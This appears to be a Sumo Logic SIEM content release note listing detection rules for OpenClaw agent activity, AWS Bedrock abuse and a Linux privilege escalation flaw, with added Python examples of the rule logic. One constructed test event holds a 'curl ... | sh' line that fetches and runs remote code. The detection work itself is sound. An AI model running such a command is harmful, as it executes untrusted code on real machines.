
June 12th, 2026 - Content Release

  • This content release includes:
    • Removed redundant field mappings for AWS CloudTrail and updated 40+ AWS CloudTrail rules. srcDevice_ip and device_ip are no longer mapped from the same source field. Out-of-the-box rules have been updated accordingly, but custom rules that reference only device_ip as an entity may need adjusting so that they are still fed by the updated mappings.
    • 5 new AWS Bedrock security rules detecting RAG poisoning via external S3 data sources, knowledge base mass deletion, IAM privilege escalation targeting Bedrock services, and rapid guardrail intervention attempts indicating jailbreak activity
    • 4 new OpenClaw AI agent monitoring rules providing visibility into shell execution, out-of-band skill injection, child process outbound connections, and unsanctioned installations via network activity
    • 2 new Linux privilege escalation rules detecting exploitation of CVE-2026-31431 (CopyFail), a high-severity kernel vulnerability in the cryptographic subsystem that enables root access
    • Improved entity correlation across 40+ AWS CloudTrail rules through standardized device and source device field mappings
    • New Fortinet authentication log mapping with parser enhancements, and improved user agent extraction for Microsoft Office 365 authentication events
    • Changes are enumerated below

Rules

  • [New] MATCH-S01153 AF_ALG Socket Opened by Unprivileged Process
    • An unprivileged process on a Linux host opened a socket using the kernel cryptographic API subsystem (AF_ALG).
  • [New] CHAIN-S00027 OpenClaw - Outbound Connection from Child Process
    • This ordered chain rule triggers when a child process of an openclaw-gateway node process is created on a host and, within 5 minutes, the same process on the same host makes an outbound network connection to an external IP; events are grouped by process ID and hostname. Command lines associated with ip neighbor discovery are excluded, as these can be a normal part of OpenClaw operation.
  • [New] MATCH-S01149 OpenClaw - Shell Launch by Gateway
    • This rule triggers when a Node.js process with 'openclaw' in its command line spawns a shell interpreter such as bash, zsh, sh, PowerShell or python. It monitors process creation events to identify when OpenClaw's shell integration features actively execute system commands. Command lines associated with ip neighbor discovery are excluded, as these can be a normal part of OpenClaw operation.
  • [New] MATCH-S01152 OpenClaw - Skill Installed Out-of-Band
    • This rule triggers when a file matching .openclawskills*.md is created by a process whose base image is not "node" (the standard OpenClaw runtime). It monitors Sysmon FileCreate events and flags skill file writes that occur outside the official openclaw or clawhub installer processes.
  • [New] MATCH-S01150 OpenClaw - Activity on Default Port
    • This rule triggers when a websocket connection to TCP port 18789 returns HTTP status 'Switching Protocols', indicating a completed websocket handshake. Port 18789 is OpenClaw's default local server port, so this provides detection of active OpenClaw usage.
  • [New] FIRST-S00101 AWS Bedrock - KB Data Source from External S3 Bucket
    • This rule triggers when an S3 bucket from an external AWS account is added to a Bedrock Knowledge Base via an UpdateDataSource or CreateDataSource API call and that external AWS account has not been observed in the last 90 days.
  • [New] THRESHOLD-S00125 AWS Bedrock - Knowledge Base Mass Deletion
    • This rule triggers when a user deletes multiple AWS Bedrock Knowledge Bases within a short time period from the same source IP address. It monitors CloudTrail logs for successful DeleteKnowledgeBase API calls and excludes AWS service-linked roles.
  • [New] MATCH-S01151 AWS Bedrock - Privileged Permissions Granted
    • This rule triggers when Bedrock IAM permissions are granted through: (1) attachment of managed policies (AmazonBedrockFullAccess, AmazonBedrockStudioFullAccess), (2) creation of policies containing Bedrock actions, or (3) inline policy assignments. It monitors high-risk actions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
  • [New] CHAIN-S00026 AWS Bedrock - Privileged Policy Created and Attached
    • This rule triggers when Bedrock IAM permissions are granted through the creation and attachment of an IAM policy with privileged Bedrock permissions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
  • [New] THRESHOLD-S00124 AWS Bedrock - Rapid Guardrail Interventions
    • This rule triggers when 10 or more Bedrock Guardrail interventions occur within 60 seconds for a user. It monitors CloudWatch logs where stopReason equals 'guardrail_intervened', indicating the guardrail blocked model responses that violated content policies.
  • [New] MATCH-S01154 Unexpected Root Process from Unprivileged Login Session
    • A user executed a program as root on a Linux host while the originating login session belongs to an unprivileged user, which is inconsistent with legitimate privilege escalation workflows.
  • [Updated] MATCH-S00307 AWS - Excessive OAuth Application Permissions Scope
  • [Updated] MATCH-S00306 AWS - New UserPoolClient Created
  • [Updated] MATCH-S00921 AWS Bedrock Model Invocation Logging Configuration Change Observed
  • [Updated] MATCH-S00715 AWS Cloud Storage Deletion
  • [Updated] AGGREGATION-S00002 AWS CloudTrail - Aggressive Reconnaissance
  • [Updated] LEGACY-S00207 AWS CloudTrail - Customer Master Key Disabled or Scheduled for Deletion
  • [Updated] MATCH-S00261 AWS CloudTrail - Database Snapshot Created
  • [Updated] MATCH-S00208 AWS CloudTrail - EC2 Access Key Action Detected
  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] MATCH-S00111 AWS CloudTrail - IAM CreateUser Action Observed
  • [Updated] LEGACY-S00206 AWS CloudTrail - IAM Policy Applied
  • [Updated] MATCH-S00101 AWS CloudTrail - IAM Privileged Policy Applied to Group
  • [Updated] MATCH-S00104 AWS CloudTrail - IAM Privileged Policy Applied to Role
  • [Updated] MATCH-S00099 AWS CloudTrail - IAM Privileged Policy Applied to User
  • [Updated] THRESHOLD-S00051 AWS CloudTrail - IAM User Generating AccessDenied Errors Across Multiple Actions
  • [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
  • [Updated] MATCH-S00308 AWS CloudTrail - OpsWorks Describe Permissions Event
  • [Updated] MATCH-S00109 AWS CloudTrail - Permissions Boundary Lifted
  • [Updated] MATCH-S00105 AWS CloudTrail - Public S3 Bucket Exposed
  • [Updated] MATCH-S00213 AWS CloudTrail - Reconnaissance related event
  • [Updated] MATCH-S00096 AWS CloudTrail - Root Console Successful Login Observed
  • [Updated] MATCH-S00764 AWS CloudTrail - S3 Bucket Public Access Block Disabled
  • [Updated] MATCH-S00210 AWS CloudTrail - SQS List Queues Event
  • [Updated] MATCH-S00240 AWS CloudTrail - ScheduleKeyDeletion in KMS
  • [Updated] MATCH-S00247 AWS CloudTrail - Secrets Manager sensitive admin action observed
  • [Updated] MATCH-S00238 AWS CloudTrail - sensitive activity in KMS
  • [Updated] MATCH-S00540 AWS CloudTrail Network Access Control List Deleted
  • [Updated] MATCH-S00664 AWS CloudWatch Alarm Actions Disabled
  • [Updated] MATCH-S00663 AWS CloudWatch Alarm Deletion
  • [Updated] MATCH-S00662 AWS CloudWatch Anomaly Detector Deletion
  • [Updated] MATCH-S00665 AWS CloudWatch Log Group Deletion
  • [Updated] MATCH-S00661 AWS CloudWatch Log Stream Deletion
  • [Updated] MATCH-S00671 AWS Config Recorder Deletion
  • [Updated] MATCH-S00672 AWS Config Recorder Stopped
  • [Updated] MATCH-S00670 AWS Config Service Tampering
  • [Updated] MATCH-S00654 AWS ECS Cluster Deleted
  • [Updated] MATCH-S00716 AWS Image Creation
  • [Updated] MATCH-S00717 AWS Image Deletion
  • [Updated] THRESHOLD-S00106 AWS Image Discovery
  • [Updated] MATCH-S00718 AWS Image Modification
  • [Updated] MATCH-S00719 AWS Instance Creation
  • [Updated] MATCH-S00720 AWS Instance Deletion
  • [Updated] THRESHOLD-S00107 AWS Instance Discovery
  • [Updated] MATCH-S00721 AWS Instance Modification
  • [Updated] MATCH-S00679 AWS Route 53 Domain Registered
  • [Updated] THRESHOLD-S00093 AWS Route 53 Reconnaissance
  • [Updated] MATCH-S00677 AWS Route 53 Service Tampering
  • [Updated] MATCH-S00680 AWS Route 53 TestDNSAnswer
  • [Updated] MATCH-S00678 AWS Route 53 Traffic Policy Creation
  • [Updated] MATCH-S00674 AWS WAF Access Control List Updated
  • [Updated] THRESHOLD-S00092 AWS WAF Reconnaissance
  • [Updated] MATCH-S00676 AWS WAF Rule Group Updated
  • [Updated] MATCH-S00675 AWS WAF Rule Updated
  • [Updated] MATCH-S00673 AWS WAF Service Tampering
  • [Updated] MATCH-S00660 Anomalous AWS User Executed a Command on ECS Container
  • [Updated] MATCH-S00686 Base64 Decode in Command Line
  • [Updated] FIRST-S00085 First Seen Role Creating AWS Bedrock Agent
  • [Updated] MATCH-S00655 New Container Uploaded to AWS ECR
  • [Updated] MATCH-S00826 SSH Keys Added to EC2 Instance
  • [Updated] MATCH-S00281 Windows - PowerShell Process Discovery
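
The following is an added example, not Sumo Logic's rule code, showing the matching and ordered-chain logic described above for MATCH-S01149 (OpenClaw - Shell Launch by Gateway) and CHAIN-S00027 (OpenClaw - Outbound Connection from Child Process), run over constructed Sysmon-style process-creation and network-connection events. The event field names, the shell list, the `ip neigh` exclusion pattern, the gateway command line and the address ranges used to decide what counts as "external" are all assumptions; the real rules operate on Cloud SIEM's normalized record schema.

```python
"""Added example, not Sumo Logic's rule code: MATCH-S01149 and CHAIN-S00027 logic
over constructed Sysmon-style process-creation and network-connection events."""
import re
import ipaddress
from datetime import datetime, timedelta

# Assumed shell set (image basenames) and the node image names the rules key on.
SHELLS = {"bash", "zsh", "sh", "powershell", "pwsh", "python", "python3"}
NODE_IMAGES = {"node", "node.exe"}
# Assumed "ip [opts] neigh[bor] ..." exclusion: normal OpenClaw housekeeping per the rule text.
NEIGH_RE = re.compile(r"\bip\b(?:\s+-\S+)*\s+neigh")
# Assumed internal ranges; a destination outside all of them counts as "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "100.64.0.0/10")]


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_ip_neighbor_discovery(cmdline):
    return NEIGH_RE.search(cmdline.lower()) is not None


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def shell_launch_by_gateway(events):
    """MATCH-S01149 analogue: a node process with 'openclaw' in its command line spawns a shell."""
    hits = []
    for ev in events:
        if ev["type"] != "process_create":
            continue
        if basename(ev["parent_image"]) not in NODE_IMAGES:
            continue
        if "openclaw" not in ev["parent_command_line"].lower():
            continue
        if basename(ev["image"]) not in SHELLS:
            continue
        if is_ip_neighbor_discovery(ev["command_line"]):
            continue
        hits.append(ev)
    return hits


def outbound_from_gateway_child(events, window=timedelta(minutes=5)):
    """CHAIN-S00027 analogue: stage 1 is a child of an openclaw-gateway node process; stage 2
    is an outbound connection to an external IP from the same (host, pid) within `window`."""
    stage1 = {}   # (host, pid) -> the qualifying process_create event
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["pid"])
        if ev["type"] == "process_create":
            if (basename(ev["parent_image"]) in NODE_IMAGES
                    and "openclaw-gateway" in ev["parent_command_line"].lower()
                    and not is_ip_neighbor_discovery(ev["command_line"])):
                stage1[key] = ev
        elif ev["type"] == "network_connect" and ev["direction"] == "outbound":
            first = stage1.get(key)
            if first is None or ev["ts"] - first["ts"] > window:
                continue
            if is_external(ev["dst_ip"]):
                alerts.append((first, ev))
    return alerts


T0 = datetime(2026, 6, 12, 9, 0, 0)
GATEWAY = "node /opt/openclaw/dist/openclaw-gateway.js"   # assumed gateway command line


def proc(ts, pid, image, cmdline, parent_cmd=GATEWAY):
    return {"type": "process_create", "ts": ts, "host": "dev-box-01", "pid": pid,
            "image": image, "command_line": cmdline,
            "parent_image": "/usr/bin/node", "parent_command_line": parent_cmd}


def conn(ts, pid, dst_ip):
    return {"type": "network_connect", "ts": ts, "host": "dev-box-01", "pid": pid,
            "direction": "outbound", "dst_ip": dst_ip, "dst_port": 443}


# Constructed events; RFC 5737 documentation addresses stand in for public IPs.
SAMPLE_EVENTS = [
    proc(T0, 4101, "/usr/bin/bash", "bash -c 'curl -s http://203.0.113.7/setup | sh'"),
    conn(T0 + timedelta(seconds=40), 4101, "203.0.113.7"),            # 40 s later, external: chain fires
    proc(T0 + timedelta(seconds=5), 4102, "/usr/bin/sh", "sh -c 'ip neighbor show'"),  # excluded
    conn(T0 + timedelta(seconds=45), 4102, "192.168.1.1"),             # internal anyway
    proc(T0 + timedelta(seconds=60), 4103, "/usr/bin/python3", "python3 /opt/openclaw/tools/sync.py"),
    conn(T0 + timedelta(minutes=7), 4103, "198.51.100.9"),            # external but outside 5 min
]

if __name__ == "__main__":
    for ev in shell_launch_by_gateway(SAMPLE_EVENTS):
        print("shell launch:", ev["pid"], ev["command_line"])
    for first, net in outbound_from_gateway_child(SAMPLE_EVENTS):
        print("chain:", first["pid"], first["command_line"], "->", net["dst_ip"])
```

Run as a script it reports two shell launches (pids 4101 and 4103) but only one chain alert (pid 4101): the `ip neighbor` child is excluded from both rules, and the python child's external connection falls outside the 5-minute window.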
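
The following is an added example, not Sumo Logic's rule code, of the sliding-window threshold logic behind THRESHOLD-S00125 (AWS Bedrock - Knowledge Base Mass Deletion) and THRESHOLD-S00124 (AWS Bedrock - Rapid Guardrail Interventions) described above, with one generic counter serving both. The guardrail records are flattened, constructed stand-ins for Bedrock model invocation log entries and the CloudTrail records are trimmed and constructed; the rule text gives the 10-in-60-seconds setting for guardrails but not the count or period for mass deletion, so 3 deletions in 10 minutes is an assumption. Service-linked roles are recognised by the reserved `/aws-service-role/` path in the role ARN.

```python
"""Added example, not Sumo Logic's rule code: sliding-window threshold logic behind
THRESHOLD-S00124 and THRESHOLD-S00125, run over constructed log records."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def parse_ct_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def threshold_alerts(events, *, ts_fn, key_fn, predicate, threshold, window):
    """Fire when `threshold` matching events for one key fall inside a trailing `window`.
    The alert is emitted when the count first reaches the threshold; the same key fires
    again only after older events age out of the window and it refills."""
    buckets = defaultdict(deque)
    alerts = []
    for ev in sorted(events, key=ts_fn):
        if not predicate(ev):
            continue
        ts, key = ts_fn(ev), key_fn(ev)
        q = buckets[key]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) == threshold:
            alerts.append({"key": key, "count": len(q), "first": q[0], "last": ts})
    return alerts


def is_service_linked(user_identity):
    """AWS service-linked roles live under the reserved /aws-service-role/ path."""
    issuer = user_identity.get("sessionContext", {}).get("sessionIssuer", {}).get("arn", "")
    return "/aws-service-role/" in issuer or "/aws-service-role/" in user_identity.get("arn", "")


def rapid_guardrail_interventions(logs, threshold=10, window=timedelta(seconds=60)):
    """THRESHOLD-S00124 analogue: 10+ guardrail_intervened stops for one user within 60 s."""
    return threshold_alerts(
        logs, ts_fn=lambda e: e["ts"], key_fn=lambda e: e["user"],
        predicate=lambda e: e.get("stopReason") == "guardrail_intervened",
        threshold=threshold, window=window)


def kb_mass_deletion(trail, threshold=3, window=timedelta(minutes=10)):
    """THRESHOLD-S00125 analogue, keyed by (actor, source IP). 3 in 10 minutes is assumed."""
    def successful_delete(ev):
        return (ev.get("eventSource") == "bedrock.amazonaws.com"
                and ev.get("eventName") == "DeleteKnowledgeBase"
                and "errorCode" not in ev
                and not is_service_linked(ev.get("userIdentity", {})))
    return threshold_alerts(
        trail, ts_fn=lambda e: parse_ct_time(e["eventTime"]),
        key_fn=lambda e: (e["userIdentity"]["arn"], e["sourceIPAddress"]),
        predicate=successful_delete, threshold=threshold, window=window)


# Constructed, flattened invocation-log records: 12 interventions for alice in 44 s, 4 for bob.
T0 = datetime(2026, 6, 12, 10, 0, 0)
ALICE = "arn:aws:iam::123456789012:user/alice"
BOB = "arn:aws:iam::123456789012:user/bob"
GUARDRAIL_LOGS = (
    [{"ts": T0 + timedelta(seconds=4 * i), "user": ALICE, "stopReason": "guardrail_intervened"} for i in range(12)]
    + [{"ts": T0 + timedelta(seconds=15 * i), "user": BOB, "stopReason": "guardrail_intervened"} for i in range(4)]
    + [{"ts": T0 + timedelta(seconds=1), "user": ALICE, "stopReason": "end_turn"}]
)


def ct(event_time, name, ip, arn, issuer=None, error=None):
    """Constructed, trimmed-down CloudTrail record."""
    ev = {"eventTime": event_time, "eventSource": "bedrock.amazonaws.com", "eventName": name,
          "sourceIPAddress": ip, "userIdentity": {"arn": arn}}
    if issuer:
        ev["userIdentity"]["sessionContext"] = {"sessionIssuer": {"arn": issuer}}
    if error:
        ev["errorCode"] = error
    return ev


CAROL = "arn:aws:sts::123456789012:assumed-role/DataEng/carol"
SLR = "arn:aws:iam::123456789012:role/aws-service-role/bedrock.amazonaws.com/AWSServiceRoleForAmazonBedrock"
CLOUDTRAIL = [
    ct("2026-06-12T10:00:00Z", "DeleteKnowledgeBase", "203.0.113.5", CAROL),
    ct("2026-06-12T10:00:30Z", "DeleteKnowledgeBase", "203.0.113.5", CAROL, error="AccessDeniedException"),
    ct("2026-06-12T10:00:40Z", "DeleteKnowledgeBase", "bedrock.amazonaws.com",
       "arn:aws:sts::123456789012:assumed-role/AWSServiceRoleForAmazonBedrock/cleanup", issuer=SLR),
    ct("2026-06-12T10:01:30Z", "DeleteKnowledgeBase", "203.0.113.5", CAROL),
    ct("2026-06-12T10:02:00Z", "ListKnowledgeBases", "203.0.113.5", CAROL),
    ct("2026-06-12T10:03:20Z", "DeleteKnowledgeBase", "203.0.113.5", CAROL),   # third success: alert
]

if __name__ == "__main__":
    print(rapid_guardrail_interventions(GUARDRAIL_LOGS))
    print(kb_mass_deletion(CLOUDTRAIL))
```

The failed deletion (errorCode present) and the service-linked role's deletion never enter the counter, so only carol's three successful deletes from 203.0.113.5 reach the threshold; alice's burst fires exactly once even though it continues past the tenth intervention.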
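
The following is an added example, not Sumo Logic's rule code, of the first-seen logic behind FIRST-S00101 (AWS Bedrock - KB Data Source from External S3 Bucket) described above, run over constructed CloudTrail records. It assumes the cross-account bucket owner is declared in `requestParameters.dataSourceConfiguration.s3Configuration.bucketOwnerAccountId`, the field Bedrock's CreateDataSource/UpdateDataSource requests use for buckets outside the calling account, and compares it against `recipientAccountId`; the 90-day baseline here is built from the events the function sees, whereas the production rule has history to draw on before it is enabled.

```python
"""Added example, not Sumo Logic's rule code: first-seen logic behind FIRST-S00101,
run over constructed CloudTrail records for Bedrock CreateDataSource/UpdateDataSource."""
from datetime import datetime, timedelta


def parse_ct_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def external_bucket_owner(ev):
    """Return the owning account of a cross-account S3 data source, else None.
    Assumption: the owner is declared in
    requestParameters.dataSourceConfiguration.s3Configuration.bucketOwnerAccountId."""
    if ev.get("eventSource") != "bedrock.amazonaws.com":
        return None
    if ev.get("eventName") not in ("CreateDataSource", "UpdateDataSource") or "errorCode" in ev:
        return None
    cfg = ev.get("requestParameters", {}).get("dataSourceConfiguration", {})
    if cfg.get("type") != "S3":
        return None
    owner = cfg.get("s3Configuration", {}).get("bucketOwnerAccountId")
    if not owner or owner == ev.get("recipientAccountId"):
        return None   # own bucket, or no cross-account owner declared
    return owner


def first_seen_external_sources(trail, baseline_days=90):
    """Alert when a KB data source points at a bucket owned by an account that the
    recipient account has not used as a data-source owner in the previous `baseline_days`."""
    last_seen = {}   # (recipient account, owner account) -> most recent sighting
    alerts = []
    for ev in sorted(trail, key=lambda e: parse_ct_time(e["eventTime"])):
        owner = external_bucket_owner(ev)
        if owner is None:
            continue
        ts = parse_ct_time(ev["eventTime"])
        key = (ev["recipientAccountId"], owner)
        prev = last_seen.get(key)
        if prev is None or ts - prev > timedelta(days=baseline_days):
            s3 = ev["requestParameters"]["dataSourceConfiguration"]["s3Configuration"]
            alerts.append({"eventTime": ev["eventTime"], "eventName": ev["eventName"],
                           "owner": owner, "bucket": s3["bucketArn"],
                           "actor": ev["userIdentity"]["arn"]})
        last_seen[key] = ts
    return alerts


def ct(event_time, name, owner, bucket, error=None):
    """Constructed, trimmed-down CloudTrail record for a Bedrock data-source call."""
    ev = {"eventTime": event_time, "eventSource": "bedrock.amazonaws.com", "eventName": name,
          "recipientAccountId": "123456789012",
          "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/MLPlatform/dave"},
          "requestParameters": {"knowledgeBaseId": "KB1234ABCD", "dataSourceConfiguration": {
              "type": "S3", "s3Configuration": {"bucketArn": bucket, "bucketOwnerAccountId": owner}}}}
    if error:
        ev["errorCode"] = error
    return ev


CLOUDTRAIL = [
    ct("2026-03-01T09:00:00Z", "CreateDataSource", "111111111111", "arn:aws:s3:::partner-docs"),   # new owner: alert
    ct("2026-03-02T09:00:00Z", "UpdateDataSource", "111111111111", "arn:aws:s3:::partner-docs"),   # seen yesterday
    ct("2026-03-03T09:00:00Z", "CreateDataSource", "123456789012", "arn:aws:s3:::internal-kb"),    # own account
    ct("2026-03-04T09:00:00Z", "CreateDataSource", "222222222222", "arn:aws:s3:::rag-feed",
       error="AccessDeniedException"),                                                           # failed call
    ct("2026-06-12T09:00:00Z", "UpdateDataSource", "111111111111", "arn:aws:s3:::partner-docs"),   # 102 days later: alert
]

if __name__ == "__main__":
    for a in first_seen_external_sources(CLOUDTRAIL):
        print(a)
```

Two alerts come out: the first sighting of account 111111111111 on March 1, and the June 12 update, which is 102 days after the previous sighting and so falls outside the 90-day baseline; the same-account bucket and the denied call produce nothing.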

Log Mappers

  • [New] Fortinet Authentication Logs
  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - Trail Change|Logging
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - All Network Events
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - ecs.amazonaws.com - AwsApiCall-ExecuteCommand
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - Policy Change
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey|ScheduleKeyDeletion
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - lambda.amazonaws.com - Audit Change
  • [Updated] CloudTrail - lambda.amazonaws.com - DeleteEventSourceMapping|DeleteFunction
  • [Updated] CloudTrail - lambda.amazonaws.com - DeleteFunctionUrlConfig
  • [Updated] CloudTrail - lambda.amazonaws.com - GetFunction
  • [Updated] CloudTrail - lambda.amazonaws.com - GetLayerVersionPolicy
  • [Updated] CloudTrail - lambda.amazonaws.com - GetPolicy|GetLayerVersionPolicy
  • [Updated] CloudTrail - lambda.amazonaws.com - ListEventSourceMappings
  • [Updated] CloudTrail - lambda.amazonaws.com - ListFunctions
  • [Updated] CloudTrail - lambda.amazonaws.com - Resource Access
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination|DeleteLogGroup|DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - Bucket Change
  • [Updated] CloudTrail - s3.amazonaws.com - GetBucketAcl
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded|RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - All AwsConsoleSignIn events
  • [Updated] CloudTrail - sso.amazonaws.com - Federate|ListProfilesForApplication
  • [Updated] CloudTrail Batch get Partition
  • [Updated] CloudTrail Default Mapping
  • [Updated] Microsoft Office 365 Active Directory Authentication Events

Parsers

  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
  • [Updated] /Parsers/System/Microsoft/Office 365

Copyright © 2026 by Sumo Logic, Inc.